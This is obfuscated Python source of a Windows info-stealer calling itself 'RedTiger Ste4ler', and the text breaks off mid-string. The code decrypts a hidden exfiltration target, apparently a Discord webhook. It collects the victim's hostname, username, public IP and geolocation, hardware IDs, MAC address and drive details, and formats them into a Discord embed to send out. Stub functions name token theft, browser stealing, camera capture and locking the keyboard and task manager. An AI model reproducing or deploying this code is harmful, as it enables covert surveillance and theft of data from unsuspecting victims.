
import sys

def On1y_W1nd0w5():
    if sys.platform.startswith("win"):
        return False
    else:
        return True

try: VHIITRNKRBWSOKXBQTAZLLWWJZEKNXIFIPTPPPFAIRUYULPELRULUIXIDUQNABAYXQHKGUCPFFVNEP = On1y_W1nd0w5()
except: VHIITRNKRBWSOKXBQTAZLLWWJZEKNXIFIPTPPPFAIRUYULPELRULUIXIDUQNABAYXQHKGUCPFFVNEP = False

if VHIITRNKRBWSOKXBQTAZLLWWJZEKNXIFIPTPPPFAIRUYULPELRULUIXIDUQNABAYXQHKGUCPFFVNEP == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y(): pass
def Unb10ck_K3y(): pass
def B10ck_T45k_M4n4g3r(): pass
def B10ck_M0u53(): pass
def B10ck_W3b5it3(): pass
def St4rtup(): pass
def Sy5t3m_Inf0(): pass
def Op3n_U53r_Pr0fi13_53tting5(): pass
def Scr33n5h0t(): pass
def C4m3r4_C4ptur3(): pass
def Di5c0rd_T0k3n(): pass
def Di5c0rd_inj3c710n(): pass
def Br0w53r_5t341(): pass
def R0b10x_C00ki3(): pass
def F4k3_3rr0r(): pass
def Sp4m_0p3n_Pr0gr4m(): pass
def Sp4m_Cr34t_Fil3(): pass
def Shutd0wn(): pass
def Sp4m_Opti0ns(): pass
def R3st4rt(): pass

def Clear():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def Decrypt(KIJLEXEYRPXCIWWCBXFHNJODTTEGQRFGIKWIHPUWWEJRMODOVPUMAUFRFTFFEPDFZRXLTYGZ, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):  
            v4r_password = v4r_password.encode()  
        return v4r_kdf.derive(v4r_password)

    KIJLEXEYRPXCIWWCBXFHNJODTTEGQRFGIKWIHPUWWEJRMODOVPUMAUFRFTFFEPDFZRXLTYGZ_data = base64.b64decode(KIJLEXEYRPXCIWWCBXFHNJODTTEGQRFGIKWIHPUWWEJRMODOVPUMAUFRFTFFEPDFZRXLTYGZ)
    v4r_salt = KIJLEXEYRPXCIWWCBXFHNJODTTEGQRFGIKWIHPUWWEJRMODOVPUMAUFRFTFFEPDFZRXLTYGZ_data[:16]
    v4r_iv = KIJLEXEYRPXCIWWCBXFHNJODTTEGQRFGIKWIHPUWWEJRMODOVPUMAUFRFTFFEPDFZRXLTYGZ_data[16:32]
    KIJLEXEYRPXCIWWCBXFHNJODTTEGQRFGIKWIHPUWWEJRMODOVPUMAUFRFTFFEPDFZRXLTYGZ_data = KIJLEXEYRPXCIWWCBXFHNJODTTEGQRFGIKWIHPUWWEJRMODOVPUMAUFRFTFFEPDFZRXLTYGZ_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(KIJLEXEYRPXCIWWCBXFHNJODTTEGQRFGIKWIHPUWWEJRMODOVPUMAUFRFTFFEPDFZRXLTYGZ_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()

HRSOOMPXLIYPUCMIKTHOSKLQHFVDFPVZFWRXUPJGKOKHOJNZMKWPCRVXPRABGUMJOPRNOIDXQZNMANKEIHSMAWSIYSRFCD = r"""
PVavC8sm9NolBbA2qjBFYD3pXAbt3QQ0NUX1W2nm+ZYS8ea4ys2KAzgnYNnZY53azlGf+CxxWL1n6cONGz90D4HQ1Gw8MufK4QSjZNIxBzo=
"""
BURVXLJGJLXIFDFDOROOHXHERKDYMIYEJPJCQVEMTOHOPVULEMHOFXTSQQRDWQRYLFDBHHKPOUWHUNAOHSH = "xbOVGVudurnVrmAAsXTOKzEqcuSFClNidtXEfKapONbMfieduiqmldqjEXFHBxdtzvEOzvcBwisnhfcVHxWhoqepzfzIgjZUKJLCZHoknjRHFPrBToUGExsIUzNTKaDZjfeDlBFsZaGsoUwnJnsLcQ"
UDELHRCDQKOZETTNBJUCEFBXQRQZTVYKIBMZGYFASGQIWFQMRMCESSPDYOCG = "redtiger.shop"
PFHVDVLRCIKQFKZKMAXBUFSXESZFEQFFSDQHJIHCEWODXJJGXJXVVQYBNPUCBUSRCOPDHXXOWNPCZMMABKVJTUWEUU = 0xa80505
IAAZAQSFWWUDKOUTXKIWBSXMGRLRCSGOKOQPZJYGESQNYKYDIJXCJIKPKEEIVHIUEI = "RedTiger Ste4ler"
TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ = "https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&"
KSBKANFPGYCJBXSWYLPSNWPMQAFEZUODOTNXCIKVZNALSEFUXEC = "RedTiger Ste4ler - github.com/loxy0dev/RedTiger-Tools"
RJVEXHJZGDQPTUPLJOBATUHRNTPKROOJXRMCWYDQSVJJIUDRPKIMCSJAVODHSWMYAPOPWRHCIAGCMSUVFBSRE = {
        "text": KSBKANFPGYCJBXSWYLPSNWPMQAFEZUODOTNXCIKVZNALSEFUXEC,
        "icon_url": TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ,
        }
                 
BYBYBFOQOBVJYXNEPBZPTFJLCQLXILMKFMPSVOBREBZVBMLEOMTCQYPFRKLCRUPJSZHKWXFBAQMMATJBPDVQGELJ = Decrypt(HRSOOMPXLIYPUCMIKTHOSKLQHFVDFPVZFWRXUPJGKOKHOJNZMKWPCRVXPRABGUMJOPRNOIDXQZNMANKEIHSMAWSIYSRFCD, BURVXLJGJLXIFDFDOROOHXHERKDYMIYEJPJCQVEMTOHOPVULEMHOFXTSQQRDWQRYLFDBHHKPOUWHUNAOHSH)

try: WHJUVHKGMFECCEIYSKVUHLPSOVRNGNZDTTMISJJGTUBICXKZIQLCVPCCQLIHHBHCPFSAJUNCVOTCWDIEVTBPUIK = socket.gethostname()
except: WHJUVHKGMFECCEIYSKVUHLPSOVRNGNZDTTMISJJGTUBICXKZIQLCVPCCQLIHHBHCPFSAJUNCVOTCWDIEVTBPUIK = "None"

try: BSAFUUSPGJPQKPFKTUDSHOPGXHGVEMHYGJMTSTDTPURCJPBJFSD = os.getlogin()
except: BSAFUUSPGJPQKPFKTUDSHOPGXHGVEMHYGJMTSTDTPURCJPBJFSD = "None"

try: IHSDNGBPQMJNWZINHUMAFETWHGIXARJDDXLQIRFQNURFIZNRKCKDNIEMPNL = win32api.GetUserNameEx(win32api.NameDisplay)
except: IHSDNGBPQMJNWZINHUMAFETWHGIXARJDDXLQIRFQNURFIZNRKCKDNIEMPNL = "None"

try: DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV = "None"

try: BTVQXALGMQUZKWPVFTZIQYYYPDXORKRZXGYZSDIXNQEVXQEULRWNOL = socket.gethostbyname(socket.gethostname())
except: BTVQXALGMQUZKWPVFTZIQYYYPDXORKRZXGYZSDIXNQEVXQEULRWNOL = "None"

try:
    VTUMERIROQDLOWWUIADNMEVLIYLICFESENGJWXRPXCAJQLCCMSDZBLIMTZMKCQSXENIAMIXQQKQCCHUOWVQUBVHQUNJASTLEC = requests.get(f"https://{UDELHRCDQKOZETTNBJUCEFBXQRQZTVYKIBMZGYFASGQIWFQMRMCESSPDYOCG}/api/ip/ip={DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}")
    XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII = VTUMERIROQDLOWWUIADNMEVLIYLICFESENGJWXRPXCAJQLCCMSDZBLIMTZMKCQSXENIAMIXQQKQCCHUOWVQUBVHQUNJASTLEC.json()

    YLZHPTGZWJHGLFHVYQGGTAFICTJSTXKXCPRACFISHSAZELJYYJUPRHSYMDQZYCRECKUB = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('country', "None")
    YLZHPTGZWJHGLFHVYQGGTAFICTJSTXKXCPRACFISHSAZELJYYJUPRHSYMDQZYCRECKUB_code = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('country_code', "None")
    HADCIKZIFDJYRJUPBAIMXQCFRTUSNPPGWTCUHBJUREOEORYKSLRONPQKU = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('region', "None")
    HADCIKZIFDJYRJUPBAIMXQCFRTUSNPPGWTCUHBJUREOEORYKSLRONPQKU_code = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('region_code', "None")
    HZZIADSXXAETAFMPOPWQWXJCUDLEAEJHCDFDECCNIEKZKUBUXANPUPCDSOBVMSGNGQGWYQNZQGELHJWYLHKWFXN = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('zip', "None")
    ODKECATRNVDTJVCNRPIGAQGIIXXPRMCNVPIORIQYAVKISWSJBQWUEDPMXLFNCYIIRVKHOIKP = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('city', "None")
    MBBAGAXCZMJXRVAVBLBOLNNCHLJQTWOEEBZSKRTSBGVTJRQWPBTGZQXUCSNZZREABJXLDRSFFAYVD = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('latitude', "None")
    SGDQLQYEJARVVSBVTKREHMLCNGADUTMFOFKZJRRCUFARWLGVLAQEPFLGIIQKYFEYSKCPMVFTLFKY = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('longitude', "None")
    JXMDJSGJTGCYDOQKRYBCXVLODCHOCGJJUCVLDIIZZCXSEESQODLVHWZSPUDFR = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('timezone', "None")
    HOIRMENBGWWTETLBTPCHUHCDCIDFAGTJTKWPAKCLLLBCQVYKHKNPYLBYIOFRH = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('isp', "None")
    FLEAGKZLWERBMNUKMMDPJLGICSHVHJEBUHKQEFAKMTIKQBSFQBPZQWCIQNLQPJJBGXFFAMAWNZPQA = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('org', "None")
    USJSUQVQYAUUKHOYNWKJMMRVVGMINYQUNNYRODTEJKSLJTZGJTCRUHSDCJDVBMIZVQDEIYGVAQDXTMTJPGPHEAGDBKUEWOL = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('as', "None")
except:
    VTUMERIROQDLOWWUIADNMEVLIYLICFESENGJWXRPXCAJQLCCMSDZBLIMTZMKCQSXENIAMIXQQKQCCHUOWVQUBVHQUNJASTLEC = requests.get(f"http://ip-api.com/json/{DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}")
    XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII = VTUMERIROQDLOWWUIADNMEVLIYLICFESENGJWXRPXCAJQLCCMSDZBLIMTZMKCQSXENIAMIXQQKQCCHUOWVQUBVHQUNJASTLEC.json()

    YLZHPTGZWJHGLFHVYQGGTAFICTJSTXKXCPRACFISHSAZELJYYJUPRHSYMDQZYCRECKUB = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('country', "None")
    YLZHPTGZWJHGLFHVYQGGTAFICTJSTXKXCPRACFISHSAZELJYYJUPRHSYMDQZYCRECKUB_code = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('countryCode', "None")
    HADCIKZIFDJYRJUPBAIMXQCFRTUSNPPGWTCUHBJUREOEORYKSLRONPQKU = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('regionName', "None")
    HADCIKZIFDJYRJUPBAIMXQCFRTUSNPPGWTCUHBJUREOEORYKSLRONPQKU_code = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('region', "None")
    HZZIADSXXAETAFMPOPWQWXJCUDLEAEJHCDFDECCNIEKZKUBUXANPUPCDSOBVMSGNGQGWYQNZQGELHJWYLHKWFXN = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('zip', "None")
    ODKECATRNVDTJVCNRPIGAQGIIXXPRMCNVPIORIQYAVKISWSJBQWUEDPMXLFNCYIIRVKHOIKP = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('city', "None")
    MBBAGAXCZMJXRVAVBLBOLNNCHLJQTWOEEBZSKRTSBGVTJRQWPBTGZQXUCSNZZREABJXLDRSFFAYVD = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('lat', "None")
    SGDQLQYEJARVVSBVTKREHMLCNGADUTMFOFKZJRRCUFARWLGVLAQEPFLGIIQKYFEYSKCPMVFTLFKY = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('lon', "None")
    JXMDJSGJTGCYDOQKRYBCXVLODCHOCGJJUCVLDIIZZCXSEESQODLVHWZSPUDFR = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('timezone', "None")
    HOIRMENBGWWTETLBTPCHUHCDCIDFAGTJTKWPAKCLLLBCQVYKHKNPYLBYIOFRH = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('isp', "None")
    FLEAGKZLWERBMNUKMMDPJLGICSHVHJEBUHKQEFAKMTIKQBSFQBPZQWCIQNLQPJJBGXFFAMAWNZPQA = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('org', "None")
    USJSUQVQYAUUKHOYNWKJMMRVVGMINYQUNNYRODTEJKSLJTZGJTCRUHSDCJDVBMIZVQDEIYGVAQDXTMTJPGPHEAGDBKUEWOL = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('as', "None")

def Sy5t3m_Inf0():
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    from discord import SyncWebhook, Embed

    try: QQJCYRNMHZEZFZARLCKBCRLVBYFDYIJBQCIXGFBZOPESNUVTZZKHNUUGKQCZCDZMYZAUXQNOYZ = {platform.system()}
    except: QQJCYRNMHZEZFZARLCKBCRLVBYFDYIJBQCIXGFBZOPESNUVTZZKHNUUGKQCZCDZMYZAUXQNOYZ = "None"

    try: QGUGNOTYTCEIQTFTLELYTMTHOEUMSMNTPPDEUUYPOAYLWAQKVGKDWPVLRCWIVWYSQMYWTHFJGY = platform.version()
    except: QGUGNOTYTCEIQTFTLELYTMTHOEUMSMNTPPDEUUYPOAYLWAQKVGKDWPVLRCWIVWYSQMYWTHFJGY = "None"

    try: GSBJGIFJHQCKJODDFAGDKILCZNGELQKLYLGSZFLOIHGUHXATNJNEOGJC = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: GSBJGIFJHQCKJODDFAGDKILCZNGELQKLYLGSZFLOIHGUHXATNJNEOGJC = "None"

    try: TSTFSTSYDYNYEBQORWHWAXPHZSJFHFOEHLEJLHDSIENFFDPPSYUMPRAGQXRHZXMQYQNAD = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
    except: TSTFSTSYDYNYEBQORWHWAXPHZSJFHFOEHLEJLHDSIENFFDPPSYUMPRAGQXRHZXMQYQNAD = "None"

    try: MVNSXTLQXRUJOZEGWKDDPHBACEGMCUABIXTUZTGTXDTJJGLHIVNOAXTQNNMWUEEDDQDEERMYGHEVHVFJMAGHQKKGTHIOYMGKFT = round(psutil.virtual_memory().total / (1024**3), 2)
    except: MVNSXTLQXRUJOZEGWKDDPHBACEGMCUABIXTUZTGTXDTJJGLHIVNOAXTQNNMWUEEDDQDEERMYGHEVHVFJMAGHQKKGTHIOYMGKFT = "None"

    try: WYGAIWYGJMXTVKXPYEBOLVYYHBUOEFKSOCAQXQXLYHZFZFHTZQYV = platform.processor()
    except: WYGAIWYGJMXTVKXPYEBOLVYYHBUOEFKSOCAQXQXLYHZFZFHTZQYV = "None"

    try: PBXUXANAEDRGAJJFJBMVWCHAJUHMCNSYHVSUPSPSPOTZQHURCMWSGE = psutil.cpu_count(logical=False)
    except: PBXUXANAEDRGAJJFJBMVWCHAJUHMCNSYHVSUPSPSPOTZQHURCMWSGE = "None"

    try: HOMDVPZWEJQEHKJWQQBVHWDXPSZMAUKEXQJMDIQZUSJIWALQWACNVYDEBPQXGJSNMKNINSJYELHJGQSUDLLFHXDSAV = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: HOMDVPZWEJQEHKJWQQBVHWDXPSZMAUKEXQJMDIQZUSJIWALQWACNVYDEBPQXGJSNMKNINSJYELHJGQSUDLLFHXDSAV = "None"

    try:
        ZJYTROQLTLQHSJZTJGYQFHRVIQRNRHEBILMWHMLIDWRWTBTHCV = []
        DYYJBPMMVMHEDQIEOKCNWGKGTJTFPMBUACLPPOKVNUEIGRLBSYNJCZYTMSFKCLFEDKNYMAROP = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if DYYJBPMMVMHEDQIEOKCNWGKGTJTFPMBUACLPPOKVNUEIGRLBSYNJCZYTMSFKCLFEDKNYMAROP & 1:
                ZPSXAQRRBLXSJAREQJRCUUENOTFZZIBCXAKIBGEXBVNSANHQXKPRNUEHACXFWFUHNAXMOQGSFDXBMUIXLAK = v4r_letter + ":\\"
                try:
                    DTIWWXTWHKKSYFHRKKDHJWCUYDJFDTQWAPCIBNQEWNYLNNZOFWFV = ctypes.c_ulonglong(0)
                    WNUUEUCEYYALLGOOJUZDGGUHHBDSQEUOWXBYXJCROTTJPQVYLEEDZBLJOFZBWTFBRZPEXOO = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(ZPSXAQRRBLXSJAREQJRCUUENOTFZZIBCXAKIBGEXBVNSANHQXKPRNUEHACXFWFUHNAXMOQGSFDXBMUIXLAK), None, ctypes.pointer(WNUUEUCEYYALLGOOJUZDGGUHHBDSQEUOWXBYXJCROTTJPQVYLEEDZBLJOFZBWTFBRZPEXOO), ctypes.pointer(DTIWWXTWHKKSYFHRKKDHJWCUYDJFDTQWAPCIBNQEWNYLNNZOFWFV))
                    YGURDAEEGHHWEYRAQZTIABRKELNNRPOQZVZYKYWPCMBVHXKHCDDUADJHAEDQLJMYEGESCQUDCZHMAZEGPPOHLIVLKMBRSBFOSXI = WNUUEUCEYYALLGOOJUZDGGUHHBDSQEUOWXBYXJCROTTJPQVYLEEDZBLJOFZBWTFBRZPEXOO.value
                    FGTJXKTVMBHWGKHWKFQCKDAOGKLOKKOJNIHVLNMWNMZIETZSGCUVTALYQKHFURQBXFEVJLVADKJINNNFKWZVRKZUBJMAUCFJOZOB = DTIWWXTWHKKSYFHRKKDHJWCUYDJFDTQWAPCIBNQEWNYLNNZOFWFV.value
                    PPFPWOODXPTNZWBPMRTWZIBMMLKQAHCJVIFWTHUVNNAPWQQXLKW = YGURDAEEGHHWEYRAQZTIABRKELNNRPOQZVZYKYWPCMBVHXKHCDDUADJHAEDQLJMYEGESCQUDCZHMAZEGPPOHLIVLKMBRSBFOSXI - FGTJXKTVMBHWGKHWKFQCKDAOGKLOKKOJNIHVLNMWNMZIETZSGCUVTALYQKHFURQBXFEVJLVADKJINNNFKWZVRKZUBJMAUCFJOZOB
                    GUWPZDXBFLNXXFUSGFVWLUMZGJIUUCJCZDCWERVUJHUASUJWBDPEKMFDHYOCLTQLFENTGAVYIW = win32api.GetVolumeInformation(ZPSXAQRRBLXSJAREQJRCUUENOTFZZIBCXAKIBGEXBVNSANHQXKPRNUEHACXFWFUHNAXMOQGSFDXBMUIXLAK)[0]
                    drive = {
                        'drive': ZPSXAQRRBLXSJAREQJRCUUENOTFZZIBCXAKIBGEXBVNSANHQXKPRNUEHACXFWFUHNAXMOQGSFDXBMUIXLAK,
                        'total': YGURDAEEGHHWEYRAQZTIABRKELNNRPOQZVZYKYWPCMBVHXKHCDDUADJHAEDQLJMYEGESCQUDCZHMAZEGPPOHLIVLKMBRSBFOSXI,
                        'free': FGTJXKTVMBHWGKHWKFQCKDAOGKLOKKOJNIHVLNMWNMZIETZSGCUVTALYQKHFURQBXFEVJLVADKJINNNFKWZVRKZUBJMAUCFJOZOB,
                        'used': PPFPWOODXPTNZWBPMRTWZIBMMLKQAHCJVIFWTHUVNNAPWQQXLKW,
                        'name': GUWPZDXBFLNXXFUSGFVWLUMZGJIUUCJCZDCWERVUJHUASUJWBDPEKMFDHYOCLTQLFENTGAVYIW,
                    }
                    ZJYTROQLTLQHSJZTJGYQFHRVIQRNRHEBILMWHMLIDWRWTBTHCV.append(drive)
                except:
                    ()
            DYYJBPMMVMHEDQIEOKCNWGKGTJTFPMBUACLPPOKVNUEIGRLBSYNJCZYTMSFKCLFEDKNYMAROP >>= 1

        SIUZALJVCBWGXWTFHESOXZFJLEVWABPRWJQVZIFGHVSLTTJWQXCXLHJNIWPRZWNXIQFOHVZLIGFAAHQYGDXIWRUOWLMHOIBI = "{:<7} {:<10} {:<10} {:<10} {:<20}\n".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in ZJYTROQLTLQHSJZTJGYQFHRVIQRNRHEBILMWHMLIDWRWTBTHCV:
            BXKATLVRKILPXLECEILMIYUDNAFPXMALDCDQJTWUIRROPWTMGHKBMWTBKILUMSPEBZFKMNIKUZ = (v4r_drive['used'] / v4r_drive['total']) * 100
            FGTJXKTVMBHWGKHWKFQCKDAOGKLOKKOJNIHVLNMWNMZIETZSGCUVTALYQKHFURQBXFEVJLVADKJINNNFKWZVRKZUBJMAUCFJOZOB_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            YGURDAEEGHHWEYRAQZTIABRKELNNRPOQZVZYKYWPCMBVHXKHCDDUADJHAEDQLJMYEGESCQUDCZHMAZEGPPOHLIVLKMBRSBFOSXI_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            BXKATLVRKILPXLECEILMIYUDNAFPXMALDCDQJTWUIRROPWTMGHKBMWTBKILUMSPEBZFKMNIKUZ_str = "{:.2f}%".format(BXKATLVRKILPXLECEILMIYUDNAFPXMALDCDQJTWUIRROPWTMGHKBMWTBKILUMSPEBZFKMNIKUZ)
            SIUZALJVCBWGXWTFHESOXZFJLEVWABPRWJQVZIFGHVSLTTJWQXCXLHJNIWPRZWNXIQFOHVZLIGFAAHQYGDXIWRUOWLMHOIBI += "{:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   FGTJXKTVMBHWGKHWKFQCKDAOGKLOKKOJNIHVLNMWNMZIETZSGCUVTALYQKHFURQBXFEVJLVADKJINNNFKWZVRKZUBJMAUCFJOZOB_gb,
                                                                   YGURDAEEGHHWEYRAQZTIABRKELNNRPOQZVZYKYWPCMBVHXKHCDDUADJHAEDQLJMYEGESCQUDCZHMAZEGPPOHLIVLKMBRSBFOSXI_gb,
                                                                   BXKATLVRKILPXLECEILMIYUDNAFPXMALDCDQJTWUIRROPWTMGHKBMWTBKILUMSPEBZFKMNIKUZ_str,
                                                                   v4r_drive['name'])
    except:
        SIUZALJVCBWGXWTFHESOXZFJLEVWABPRWJQVZIFGHVSLTTJWQXCXLHJNIWPRZWNXIQFOHVZLIGFAAHQYGDXIWRUOWLMHOIBI = """Drive:  Free:      Total:     Use:       Name:       
None    None       None       None       None     
"""

    try:
        def is_portable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if is_portable():
            PCNUNNKKMFVWQMVIIFDAEGSVCDYDSVKBYRTRVMKRFAUZEYRWUKSYUTWHQSMLUGYYPHMAYLENJVNAHRZVTXIFANXPXPFKIJIVEXX = 'Pc Portable'
        else:
            PCNUNNKKMFVWQMVIIFDAEGSVCDYDSVKBYRTRVMKRFAUZEYRWUKSYUTWHQSMLUGYYPHMAYLENJVNAHRZVTXIFANXPXPFKIJIVEXX = 'Pc Fixed'
    except:
        PCNUNNKKMFVWQMVIIFDAEGSVCDYDSVKBYRTRVMKRFAUZEYRWUKSYUTWHQSMLUGYYPHMAYLENJVNAHRZVTXIFANXPXPFKIJIVEXX = "None"

    try: CWQTYVZMHUZKXXRFXDCHJIUZLCBWWHIYTOQYOSEGKVQQAGNZWGHDULTOANCFWSLGSIHEUNXGOXK = len(screeninfo.get_monitors())
    except: CWQTYVZMHUZKXXRFXDCHJIUZLCBWWHIYTOQYOSEGKVQQAGNZWGHDULTOANCFWSLGSIHEUNXGOXK = "None"

    embed = Embed(title=f'System Info `{BSAFUUSPGJPQKPFKTUDSHOPGXHGVEMHYGJMTSTDTPURCJPBJFSD} "{DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}"`:', color=PFHVDVLRCIKQFKZKMAXBUFSXESZFEQFFSDQHJIHCEWODXJJGXJXVVQYBNPUCBUSRCOPDHXXOWNPCZMMABKVJTUWEUU)

    embed.add_field(name=":bust_in_silhouette: User Pc:", value=f"""```Hostname    : {WHJUVHKGMFECCEIYSKVUHLPSOVRNGNZDTTMISJJGTUBICXKZIQLCVPCCQLIHHBHCPFSAJUNCVOTCWDIEVTBPUIK}
Username    : {BSAFUUSPGJPQKPFKTUDSHOPGXHGVEMHYGJMTSTDTPURCJPBJFSD}
DisplayName : {IHSDNGBPQMJNWZINHUMAFETWHGIXARJDDXLQIRFQNURFIZNRKCKDNIEMPNL}```""", inline=False)

    embed.add_field(name=":computer: System:", value=f"""```Plateform     : {PCNUNNKKMFVWQMVIIFDAEGSVCDYDSVKBYRTRVMKRFAUZEYRWUKSYUTWHQSMLUGYYPHMAYLENJVNAHRZVTXIFANXPXPFKIJIVEXX}
Exploitation  : {QQJCYRNMHZEZFZARLCKBCRLVBYFDYIJBQCIXGFBZOPESNUVTZZKHNUUGKQCZCDZMYZAUXQNOYZ} {QGUGNOTYTCEIQTFTLELYTMTHOEUMSMNTPPDEUUYPOAYLWAQKVGKDWPVLRCWIVWYSQMYWTHFJGY}
Screen Number : {CWQTYVZMHUZKXXRFXDCHJIUZLCBWWHIYTOQYOSEGKVQQAGNZWGHDULTOANCFWSLGSIHEUNXGOXK}

HWID : {TSTFSTSYDYNYEBQORWHWAXPHZSJFHFOEHLEJLHDSIENFFDPPSYUMPRAGQXRHZXMQYQNAD}
MAC  : {GSBJGIFJHQCKJODDFAGDKILCZNGELQKLYLGSZFLOIHGUHXATNJNEOGJC}
CPU  : {WYGAIWYGJMXTVKXPYEBOLVYYHBUOEFKSOCAQXQXLYHZFZFHTZQYV}, {PBXUXANAEDRGAJJFJBMVWCHAJUHMCNSYHVSUPSPSPOTZQHURCMWSGE} Core
GPU  : {HOMDVPZWEJQEHKJWQQBVHWDXPSZMAUKEXQJMDIQZUSJIWALQWACNVYDEBPQXGJSNMKNINSJYELHJGQSUDLLFHXDSAV}
